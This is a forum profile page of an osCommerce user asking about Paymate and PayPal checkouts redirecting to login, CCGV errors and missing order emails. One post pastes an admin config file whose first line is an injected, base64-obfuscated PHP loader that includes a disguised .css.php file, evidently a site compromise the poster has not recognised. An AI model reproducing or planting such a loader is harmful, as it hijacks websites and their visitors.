Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

JZM

Pioneers
  • Posts

    46
  • Joined

  • Last visited

Profile Information

  • Real Name
    Jess

JZM's Achievements

  1. Do you know if this has fixed the problem I was having with credit card redirect?
  2. I have looked and removed the 64 base from 30 files - all the same and still redirecting to login
  3. Looks ok to me: Admin: <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2NiZGVzaWduL3B1YmxpY19odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy9uZXdzbGV0dGVyL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy9kZWZhdWx0L2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?> <?php define('HTTP_SERVER', 'http://www.domain.co.nz'); define('HTTP_CATALOG_SERVER', 'http://www.domain.co.nz'); define('HTTPS_CATALOG_SERVER', ''); define('ENABLE_SSL_CATALOG', 'false'); define('DIR_FS_DOCUMENT_ROOT', '/home/username/public_html/Store/'); define('DIR_WS_ADMIN', '/Store/admin/'); define('DIR_FS_ADMIN', '/home/username/public_html/Store/'); define('DIR_WS_CATALOG', '/Store/'); define('DIR_FS_CATALOG', '/home/username/public_html/Store/'); define('DIR_WS_IMAGES', 'images/'); define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/'); define('DIR_WS_CATALOG_IMAGES', DIR_WS_CATALOG . 'images/'); define('DIR_WS_INCLUDES', 'includes/'); define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/'); define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/'); define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/'); define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/'); define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/'); define('DIR_WS_CATALOG_LANGUAGES', DIR_WS_CATALOG . 'includes/languages/'); define('DIR_FS_CATALOG_LANGUAGES', DIR_FS_CATALOG . 'includes/languages/'); define('DIR_FS_CATALOG_IMAGES', DIR_FS_CATALOG . 'images/'); define('DIR_FS_CATALOG_MODULES', DIR_FS_CATALOG . 'includes/modules/'); define('DIR_FS_BACKUP', DIR_FS_ADMIN . 'backups/'); define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'Username_Admin'); define('DB_SERVER_PASSWORD', 'password'); define('DB_DATABASE', 'username_Store'); define('USE_PCONNECT', 'false'); define('STORE_SESSIONS', 'mysql'); ?>
  4. I have also placed the below in the paymate area: Hello, I have got Ultimate SEO URLs v2.2d installed on a website and the issue that is happening is that when someone goes to pay via paymate and they confirm the order instead of being sent back to checkout_confirmation.php they get sent back to login.php. I have also had a feeling that this is happening with Paypal to. Does anyone have any ideas how we could resolve this loop issue asap. Thanks Jess
  5. Hello, I have got Ultimate SEO URLs v2.2d installed on a website and the issue that is happening is that when someone goes to pay via paymate and they confirm the order instead of being sent back to checkout_confirmation.php they get sent back to login.php. I have also had a feeling that this is happening with Paypal to. Does anyone have any ideas how we could resolve this loop issue asap. Thanks Jess
  6. I have installed this mod and my totals are showing as $0.00. I am not even using a discount code atm. How could I fix this.
  7. Does anyone no why I get Fatal error: Call to undefined method order_total::clear_posts() in /var/www/Bee/catalog/checkout_payment.php on line 87
  8. Hey, I have installed CCGV for a client and get the following error on checkout_payment.php Fatal error: Call to undefined method order_total::clear_posts() in /var/www/Bee/catalog/checkout_payment.php on line 87 require(DIR_WS_CLASSES . 'order.php'); $order = new order; // Start - CREDIT CLASS Gift Voucher Contribution require(DIR_WS_CLASSES . 'order_total.php'); $order_total_modules = new order_total; $order_total_modules->clear_posts(); // Line 87 // End - CREDIT CLASS Gift Voucher Contribution Also I cannot find order.php any ideas?
  9. I have used the version that is used in this thread have done post #20
  10. What do i do for http://localhost:8080/npaymate/expressPaymentAU.jsf i'm getting failed to connect
  11. Hello, I have used Paymate as a Credit Card payment function on a clients website. The issue that we are experiencing is that when a client makes a payment via Paymate and it leaves the store I have used Digistore. The add-on that I have used for Paymate is from Oscommerce. The store owner or the client does not get the following: (a) The Client does not get order confirmation by email after paying with Credit Card via Paymate. (B) The store owner does not receive a confirmation e-mail of the payment or the order. © The order does not show up in Digistore. Look forward to your reply and how we could fix or work around this issue.
  12. Files StyleSheet http://jzm.co.nz/Delinky/stylesheet.css Box_invoice.php http://jzm.co.nz/Delinky/box_invoice.php
×
×
  • Create New...